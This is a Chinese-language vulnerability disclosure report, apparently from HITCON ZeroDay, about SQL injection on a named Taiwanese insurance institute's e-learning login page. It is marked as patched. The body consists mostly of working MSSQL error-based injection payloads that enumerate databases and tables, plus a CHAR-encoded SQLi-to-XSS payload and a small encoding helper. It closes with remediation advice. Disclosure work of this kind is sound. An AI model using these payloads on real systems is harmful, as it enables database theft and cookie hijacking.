財團法人保險事業發展中心網站存在 SQL injection 與 SQLi to XSS

Vulnerability Overview

ZDID: ZD-2023-00416
發信 Vendor: 財團法人保險事業發展中心
Title: 財團法人保險事業發展中心網站存在 SQL injection 與 SQLi to XSS
Introduction: 網站存在 SQL injection 與 SQLi to XSS

處理狀態

目前狀態

公開

Last Update : 2023/11/18

新提交
已審核
已通報
已修補
已複測
公開

處理歷程

2023/08/10 04:36:21 : 新提交 (由 BTtea 更新此狀態)
2023/08/10 04:41:03 : 新提交 (由 BTtea 更新此狀態)
2023/08/14 09:51:50 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2023/08/14 15:39:33 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2023/08/14 15:39:33 : 審核完成 (由 HITCON ZeroDay 服務團隊更新此狀態)
2023/08/14 15:39:34 : 通報未回應 (由 HITCON ZeroDay 服務團隊更新此狀態)
2023/10/10 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
2023/11/16 17:33:49 : 複測申請中 (由 HITCON ZeroDay 服務團隊更新此狀態)
2023/11/17 08:23:13 : 確認已修補 (由 BTtea 更新此狀態)
2023/11/18 03:00:12 : 公開 (由 HITCON ZeroDay 平台自動更新)

詳細資料

ZDID：ZD-2023-00416
通報者：blacktea_player (BTtea)
風險：高
類型：資料庫注入攻擊 (SQL Injection)

參考資料

攻擊者可利用該漏洞取得後端資料庫權限及完整資料（包含大量使用者個資或敏感性資料），同時也有機會對資料進行破壞或修改。

漏洞說明： OWASP - SQL Injection
https://www.owasp.org/index.php/SQL_Injection

漏洞說明： OWASP - Top 10 - 2017 A1 - Injection
https://www.owasp.org/index.php/Top_10-2017_A1-Injection

漏洞說明： CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
https://cwe.mitre.org/data/definitions/89.html

防護方式： OWASP - SQL Injection Prevention Cheat Sheet
https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

(本欄位資訊由系統根據漏洞類別自動產生，做為漏洞參考資料。)

敘述

SQL injection

https://elearning.tii.org.tw/edu/mpage/index.php
POST : username=123&password=123&showpassword=123&captcha_code=mypv
POST 參數 username 存在 SQL injection
以下使用報錯注入
payload :
```
' and '<h1>'+db_name()+'</h1>'=1-- -
```
得到 DB name 為 tii
執行結果

爆破全部存在的DB name
payload :

' AND 1 IN (SELECT (SELECT TOP 1 SUBSTRING((ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM master..sysdatabases WHERE ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 0 ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases ORDER BY name) ORDER BY name))-- -

得到 master

payload :

' AND 1 IN (SELECT (SELECT TOP 1 SUBSTRING((ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM master..sysdatabases WHERE ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 1 ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases ORDER BY name) ORDER BY name))-- -

得到 model

payload :

' AND 1 IN (SELECT (SELECT TOP 1 SUBSTRING((ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM master..sysdatabases WHERE ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 2 ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases ORDER BY name) ORDER BY name))-- -

得到 moodle2

payload :

' AND 1 IN (SELECT (SELECT TOP 1 SUBSTRING((ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM master..sysdatabases WHERE ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 3 ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases ORDER BY name) ORDER BY name))-- -

得到 msdb

payload :

' AND 1 IN (SELECT (SELECT TOP 1 SUBSTRING((ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM master..sysdatabases WHERE ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 4 ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases ORDER BY name) ORDER BY name))-- -

得到 tempdb

payload :

' AND 1 IN (SELECT (SELECT TOP 1 SUBSTRING((ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32))),1,1024) FROM master..sysdatabases WHERE ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) NOT IN (SELECT TOP 5 ISNULL(CAST(name AS NVARCHAR(4000)),CHAR(32)) FROM master..sysdatabases ORDER BY name) ORDER BY name))-- -

得到 tii

最終得到總共六個 DB

[*] master
[*] model
[*] moodle2
[*] msdb
[*] tempdb
[*] tii

獲取 tii 資料庫的 table 數量
payload :

' AND 1 IN (SELECT ('<h1>'+(SELECT ISNULL(CAST(COUNT(table_schema+CHAR(46)+table_name) AS NVARCHAR(4000)),CHAR(32)) FROM information_schema.tables WHERE table_catalog='tii')+'</h1>'))-- -

得到數量有 528 個
執行結果

依此注入最終可得到資料庫所有資料

SQL injection to XSS

並且也可以SQL injection to XSS
payload :

' AND 1 IN (SELECT 1+(CHAR(60)+CHAR(115)+CHAR(99)+CHAR(114)+CHAR(105)+CHAR(112)+CHAR(116)+CHAR(62)+CHAR(97)+CHAR(108)+CHAR(101)+CHAR(114)+CHAR(116)+CHAR(40)+CHAR(100)+CHAR(111)+CHAR(99)+CHAR(117)+CHAR(109)+CHAR(101)+CHAR(110)+CHAR(116)+CHAR(46)+CHAR(99)+CHAR(111)+CHAR(111)+CHAR(107)+CHAR(105)+CHAR(101)+CHAR(41)+CHAR(60)+CHAR(47)+CHAR(115)+CHAR(99)+CHAR(114)+CHAR(105)+CHAR(112)+CHAR(116)+CHAR(62)))-- -

上方原始payload為 ' AND 1 IN (SELECT 1+('<script>alert(document.cookie)</script>'))-- -

其他驗證圖片

輔助測試 python 程式

print(*[f'CHAR({ord(i)})' for i in input('str:')], sep='+')

用法

修補建議

建議可以使用 PDO 框架或者 mysqli_real_escape_string 函式，或者改寫成參數化查詢來預防 SQL injection。

PDO用法:
https://blog.tarswork.com/article/quick-start-operation-mysql-using-php-pdo/

mysqli_real_escape_string用法:
https://www.runoob.com/php/func-mysqli-real-escape-string.html

參數化查詢原理解說(wiki):
https://zh.wikipedia.org/zh-tw/%E5%8F%83%E6%95%B8%E5%8C%96%E6%9F%A5%E8%A9%A2

SQL injection 攻擊成因解說(wiki):
https://zh.wikipedia.org/zh-tw/SQL%E6%B3%A8%E5%85%A5